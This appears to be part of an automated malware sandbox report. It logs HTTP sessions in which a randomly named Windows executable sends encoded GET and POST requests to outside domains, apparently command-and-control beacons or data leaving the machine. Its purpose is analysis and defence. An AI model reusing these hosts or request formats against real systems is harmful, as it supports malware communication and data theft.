                                                                                      Data Ascii: rP=Cw0Zy0LVBM79D9ZZYCVmqpEkt7SaKgJA55JtQv/bcHeYgODHTs9UiwXGotRCLDnkPpL0m3UVYoxjs9/EixpnOBYmS0TFvp28USltUnFIWmDD4j+EC65H8vyuULybninA6mbHLiEaS2JjZJo4YYVYh3nT96Ox4CeDFP0u2xvwyZndE8gPv6Qbj9xhw+bToTKcp7Pkz+EepVI1S8xqB6j+nNsabGt70e3VuJEHOUfv/6gVKJ3gyh5M4lyWckh38+K++Syl4q7yTe9FjxsXATyxssPkLodN6ytfE5zEWWvX1NMEZX/psnN/3VQmn+XhZAdwaqgBfWzUz2iYKYtZfznm4v9h/f3F1VrYhEGlWpceSo9aLmtk+RfPXY7Ud6NPfmWOfiewf4IMBiOtuWX04/3R6SOrQlL28xzYzhpaFhnr7f12IvShUskdr9mzUOvEoQfT+bcbsSiiPz5KejFEl029QdsaCvf93OcdHROy+2lY9PY0Kwx+5h0Ok9ismeNG8a+0onQvNBEmuQMP3sePheOddeEm5HYJpT/8yFud0GEHiY0MJQUg0oD7m3PC2LTaJgdoyCwdVlivwFPXmQqB9ApR/r6ESw/pyMY3beMmoz+dFU8zJxPrWPK/jUciOmCUsUdmPnPxwamsdWnyPjoyFrX8hE2A8SPOCAxBmLDhEb/+0RvSaKSoiZrIS0dZ4TGWWdTkYSGqJCn1jo1lDrCXQoqWr0ynl6R30sD9hSUVQJceDZXwOVpFmrUBJDFoYisdGOpBeaPE79LkHMjLbW8cOSHjl03TskCnPU5hnDYjP7n6jVcwivQ84FZY3ZSJw6xAnQFmoDNGG6ebwBVhyfIrEUpB6sDO5ItjBpfLNMxYH/Mu9AYcQOuKNcJRQ3hkw2PLFpxOMP+EmXh8w7ZtqV7VHMh/mjI5OGFFdW9UZQHA4LW4o9E97qVnITg8VPKQfNVer0eElr5DXavDJyFXUN7rVtALMoBSeObE1Tk+Sjo4sPmLl3C3ToR6e [TRUNCATED]
                                                                                      Nov 13, 2024 09:28:01.387176991 CET533INHTTP/1.1 404 Not Found
                                                                                      Date: Wed, 13 Nov 2024 08:28:00 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                                                      Nov 13, 2024 09:28:01.387871981 CET533INHTTP/1.1 404 Not Found
                                                                                      Date: Wed, 13 Nov 2024 08:28:00 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      20192.168.2.45910167.223.117.142802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:28:02.955741882 CET525OUTGET /brrb/?rP=Pyc5xCH2FNTrUJIJcyFngeQJg4SvOnlrloocc6vOBweawvT0T5Z/ogiftYZRDFuocKSPtlVGb/YM09jHyAcWaQwrV3rluoKHVSlnOVUNWjSt4yW6AKlEvfo=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                                                                                      Host: www.flikka.site
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Nov 13, 2024 09:28:03.628504992 CET548INHTTP/1.1 404 Not Found
                                                                                      Date: Wed, 13 Nov 2024 08:28:03 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      21192.168.2.4591023.33.130.190802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:28:08.706906080 CET795OUTPOST /i4bc/ HTTP/1.1
                                                                                      Host: www.ladylawher.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.ladylawher.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 199
                                                                                      Referer: http://www.ladylawher.shop/i4bc/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 43 35 30 4f 58 39 4a 46 56 4e 41 66 4b 38 62 52 75 5a 32 70 35 6c 67 50 78 39 30 63 48 31 4b 67 63 4c 2f 7a 63 6e 34 73 55 65 53 69 6e 4a 43 5a 69 48 73 42 30 78 56 41 6d 32 74 50 2f 46 36 38 45 31 45 32 4e 52 37 5a 4e 64 65 59 44 38 2b 59 53 5a 4b 68 6b 55 64 48 48 6e 58 4e 36 6f 31 32 52 44 78 45 33 51 75 42 35 4f 74 62 6d 30 72 43 58 4b 4e 2f 48 55 55 53 4f 62 64 44 2b 47 47 78 38 73 66 6b 67 51 45 7a 7a 47 49 32 6f 6c 58 50 64 7a 34 73 36 68 63 76 68 47 52 53 47 4f 73 69 34 54 74 43 74 6a 42 59 6c 65 79 76 59 56 42 7a 6e 44 37 58 53 38 79 4a 56 41 2f 68 33 39 31 77 6d 41 3d 3d
                                                                                      Data Ascii: rP=C50OX9JFVNAfK8bRuZ2p5lgPx90cH1KgcL/zcn4sUeSinJCZiHsB0xVAm2tP/F68E1E2NR7ZNdeYD8+YSZKhkUdHHnXN6o12RDxE3QuB5Otbm0rCXKN/HUUSObdD+GGx8sfkgQEzzGI2olXPdz4s6hcvhGRSGOsi4TtCtjBYleyvYVBznD7XS8yJVA/h391wmA==


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      22192.168.2.4591033.33.130.190802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:28:11.254400015 CET815OUTPOST /i4bc/ HTTP/1.1
                                                                                      Host: www.ladylawher.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.ladylawher.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 219
                                                                                      Referer: http://www.ladylawher.shop/i4bc/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 43 35 30 4f 58 39 4a 46 56 4e 41 66 4b 64 4c 52 69 65 43 70 6f 31 67 4d 76 74 30 63 4a 56 4b 6b 63 4c 7a 7a 63 69 41 47 55 49 43 69 6e 72 71 5a 6a 46 45 42 78 78 56 41 2b 47 74 47 37 46 36 6e 45 31 49 51 4e 52 48 5a 4e 64 61 59 44 39 4f 59 53 71 53 69 6c 45 64 46 4b 48 58 50 30 49 31 32 52 44 78 45 33 51 71 37 35 4f 6c 62 6d 46 37 43 58 76 74 77 4a 30 55 54 5a 72 64 44 36 47 47 31 38 73 66 47 67 54 41 5a 7a 45 77 32 6f 68 54 50 64 48 6b 74 77 68 63 6c 76 6d 51 74 56 4e 39 54 34 52 49 55 6b 53 5a 44 6a 64 4f 4c 55 7a 4d 70 32 79 61 41 41 38 57 36 49 48 32 56 36 2b 49 35 39 49 74 63 58 6b 35 74 79 4d 51 63 6d 55 52 66 49 4d 57 32 64 30 6b 3d
                                                                                      Data Ascii: rP=C50OX9JFVNAfKdLRieCpo1gMvt0cJVKkcLzzciAGUICinrqZjFEBxxVA+GtG7F6nE1IQNRHZNdaYD9OYSqSilEdFKHXP0I12RDxE3Qq75OlbmF7CXvtwJ0UTZrdD6GG18sfGgTAZzEw2ohTPdHktwhclvmQtVN9T4RIUkSZDjdOLUzMp2yaAA8W6IH2V6+I59ItcXk5tyMQcmURfIMW2d0k=


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      23192.168.2.4591043.33.130.190802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:28:13.799452066 CET10897OUTPOST /i4bc/ HTTP/1.1
                                                                                      Host: www.ladylawher.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.ladylawher.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 10299
                                                                                      Referer: http://www.ladylawher.shop/i4bc/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 43 35 30 4f 58 39 4a 46 56 4e 41 66 4b 64 4c 52 69 65 43 70 6f 31 67 4d 76 74 30 63 4a 56 4b 6b 63 4c 7a 7a 63 69 41 47 55 49 4b 69 6e 36 4b 5a 6a 6b 45 42 32 78 56 41 7a 6d 74 44 37 46 36 6d 45 31 51 63 4e 52 4c 6e 4e 66 79 59 44 62 36 59 51 62 53 69 73 45 64 46 57 33 58 4b 36 6f 30 73 52 44 42 41 33 51 36 37 35 4f 6c 62 6d 47 7a 43 52 36 4e 77 4c 30 55 53 4f 62 64 50 2b 47 47 4a 38 73 58 38 67 53 30 6a 79 33 34 32 6f 42 44 50 47 53 34 74 79 42 63 72 36 6d 51 31 56 4e 78 49 34 52 55 75 6b 53 39 39 6a 61 6d 4c 58 6c 56 42 6a 6a 4b 50 58 4f 36 58 63 51 4f 74 31 64 73 30 6b 34 68 47 47 55 78 46 79 64 6f 30 69 54 78 62 50 38 36 53 42 42 4c 4f 39 72 68 44 78 50 6c 47 2b 78 52 2f 6a 4d 44 4e 55 6e 64 58 63 37 51 77 39 77 2b 44 63 59 4f 33 59 47 70 68 6a 55 64 48 57 38 42 2b 68 58 6d 63 79 30 30 39 66 42 44 43 51 56 65 62 39 33 51 36 63 54 76 58 6e 41 6c 38 73 76 4b 6f 38 55 62 30 42 4a 37 64 62 6f 43 70 32 64 71 4e 47 51 53 4f 6c 69 45 50 30 2f 2b 32 78 63 56 32 78 6e 4f 53 62 2b 66 38 68 73 4d [TRUNCATED]
                                                                                      Data Ascii: rP=C50OX9JFVNAfKdLRieCpo1gMvt0cJVKkcLzzciAGUIKin6KZjkEB2xVAzmtD7F6mE1QcNRLnNfyYDb6YQbSisEdFW3XK6o0sRDBA3Q675OlbmGzCR6NwL0USObdP+GGJ8sX8gS0jy342oBDPGS4tyBcr6mQ1VNxI4RUukS99jamLXlVBjjKPXO6XcQOt1ds0k4hGGUxFydo0iTxbP86SBBLO9rhDxPlG+xR/jMDNUndXc7Qw9w+DcYO3YGphjUdHW8B+hXmcy009fBDCQVeb93Q6cTvXnAl8svKo8Ub0BJ7dboCp2dqNGQSOliEP0/+2xcV2xnOSb+f8hsMfw+Z0Li2sGAz0bbUNJh73FvqDagdvqywTkcuHCsDSNmzvi2PpXX3KwHJ8Ofvpg0at7ruNenpGqDzNFyBz5N0G1pyZDTFfIY+AIpIT5Q7GGmKBsIewYqj7DKIwzT4sHVn5IIcwlNHa9CbvxvD+1iL5+jLjHOoG9fClNQ8oV+Bl6tEPdbWZAlt9CCYcAfysPWsFzPl4GQqQAfmGOz0Mk4AW2VPYSwfGhT7VkWdjT6ADXGFcQtEjl5mBFhFQso4LaoNsEdpjdhz0yMRGaGeIF7fwR2csJsM35TyW+sPvv1ovQDtMZx8jtW1e6fxFndrH9GeT8mw2BdVa5O4dIx2XjFB3ijSPliF3FO9Ej5thQFgrd96nsCjO/puDIQXRE7XKNh9bjHbfbtQmqWT9L5hjZ1Z4fAhpgpMOohKdQ5k6BiTC2XgcHGiUrdMvEAfKKyaQu7aMGXIqUcbWT4YBBhnpAVzQTzAoIE4IPZOLJ/M5CRfQqGnoP16RF4QB6pGZdgqKrV1kgTQ5+EUs/gRZG6E1+m9e1NH7qF6UdUea86W/Wh7y4q/5pfuodrbcCHJM9rCBRjH74sUK0LlOWukBUv8+OjhftFX1DvzYXdU1Obmt2LLKos4kTx5/e5exy9IFLePTXg6aXMUN6oCeXHuMSHU3fSLbbOWsqIZ+YH0RS [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      24192.168.2.4591053.33.130.190802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:28:17.199978113 CET529OUTGET /i4bc/?rP=P7cuULF9RNNpbZDPqOSIjiALg+sZAwaoAqjHQXQRXIOUhYGrthov5xR31GNCxCywGXd8BQaSBdu7etG1CrfHuWVBHlP07YMsKwlH7wrGl8lSs0vEOZdyfzQ=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                                                                                      Host: www.ladylawher.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Nov 13, 2024 09:28:17.826349974 CET398INHTTP/1.1 200 OK
                                                                                      Server: openresty
                                                                                      Date: Wed, 13 Nov 2024 08:28:17 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 258
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 72 50 3d 50 37 63 75 55 4c 46 39 52 4e 4e 70 62 5a 44 50 71 4f 53 49 6a 69 41 4c 67 2b 73 5a 41 77 61 6f 41 71 6a 48 51 58 51 52 58 49 4f 55 68 59 47 72 74 68 6f 76 35 78 52 33 31 47 4e 43 78 43 79 77 47 58 64 38 42 51 61 53 42 64 75 37 65 74 47 31 43 72 66 48 75 57 56 42 48 6c 50 30 37 59 4d 73 4b 77 6c 48 37 77 72 47 6c 38 6c 53 73 30 76 45 4f 5a 64 79 66 7a 51 3d 26 32 70 32 68 3d 76 7a 59 54 32 6c 44 68 4a 54 5a 30 51 6c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?rP=P7cuULF9RNNpbZDPqOSIjiALg+sZAwaoAqjHQXQRXIOUhYGrthov5xR31GNCxCywGXd8BQaSBdu7etG1CrfHuWVBHlP07YMsKwlH7wrGl8lSs0vEOZdyfzQ=&2p2h=vzYT2lDhJTZ0Ql"}</script></head></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      25192.168.2.459106113.20.119.31802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:28:22.883877039 CET816OUTPOST /c1ti/ HTTP/1.1
                                                                                      Host: www.primeproperty.property
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.primeproperty.property
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 199
                                                                                      Referer: http://www.primeproperty.property/c1ti/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 5a 55 39 70 6a 4a 54 4d 7a 61 68 70 68 72 48 51 31 5a 70 47 37 63 77 54 64 31 66 66 33 66 35 44 54 62 73 46 33 65 55 71 4e 67 4e 4c 30 78 35 63 59 7a 4f 64 76 35 52 4e 73 6b 30 45 2b 58 52 30 6b 2f 48 7a 41 72 71 4c 6c 58 79 34 65 72 55 64 47 73 67 59 33 7a 6f 77 69 72 33 48 62 6b 71 50 78 70 45 5a 76 4e 36 67 71 52 37 64 70 69 32 51 72 47 44 6e 36 7a 57 55 6b 2f 42 66 49 41 6a 73 49 73 46 70 39 65 7a 46 72 33 31 49 6c 37 4e 67 76 73 73 7a 56 57 41 39 58 66 44 45 54 34 53 35 73 34 53 58 48 65 54 6c 5a 55 57 69 67 57 67 69 4b 4e 42 48 71 32 58 33 49 4a 76 46 43 36 35 52 31 51 3d 3d
                                                                                      Data Ascii: rP=ZU9pjJTMzahphrHQ1ZpG7cwTd1ff3f5DTbsF3eUqNgNL0x5cYzOdv5RNsk0E+XR0k/HzArqLlXy4erUdGsgY3zowir3HbkqPxpEZvN6gqR7dpi2QrGDn6zWUk/BfIAjsIsFp9ezFr31Il7NgvsszVWA9XfDET4S5s4SXHeTlZUWigWgiKNBHq2X3IJvFC65R1Q==
                                                                                      Nov 13, 2024 09:28:23.952790022 CET717INHTTP/1.1 404 Not Found
                                                                                      Server: openresty/1.25.3.2
                                                                                      Date: Wed, 13 Nov 2024 08:28:23 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 561
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      26192.168.2.459107113.20.119.31802800C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 13, 2024 09:28:25.425424099 CET836OUTPOST /c1ti/ HTTP/1.1
                                                                                      Host: www.primeproperty.property
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.primeproperty.property
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 219
                                                                                      Referer: http://www.primeproperty.property/c1ti/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 5a 55 39 70 6a 4a 54 4d 7a 61 68 70 75 72 33 51 79 34 70 47 2b 38 77 51 53 56 66 66 35 50 35 48 54 61 51 46 33 66 67 36 4e 53 5a 4c 30 51 4a 63 62 33 36 64 69 5a 52 4e 6a 45 30 64 77 33 52 2f 6b 2f 4b 4d 41 71 47 4c 6c 58 6d 34 65 71 6b 64 47 2f 34 66 31 6a 6f 2b 72 4c 33 4a 45 30 71 50 78 70 45 5a 76 4e 75 4f 71 52 6a 64 75 53 6d 51 72 69 58 6b 30 54 57 62 6a 2f 42 66 4d 41 6a 6f 49 73 46 66 39 62 72 2f 72 78 78 49 6c 36 64 67 76 5a 59 30 41 6d 41 2f 59 2f 43 4a 61 4b 37 4f 6c 6f 58 32 4f 4d 7a 35 45 41 69 57 6f 77 74 34 62 38 67 51 34 32 7a 45 56 4f 6d 78 50 35 45 59 75 56 57 35 4e 36 39 69 2f 5a 61 77 73 6b 65 4c 42 52 41 57 69 69 59 3d
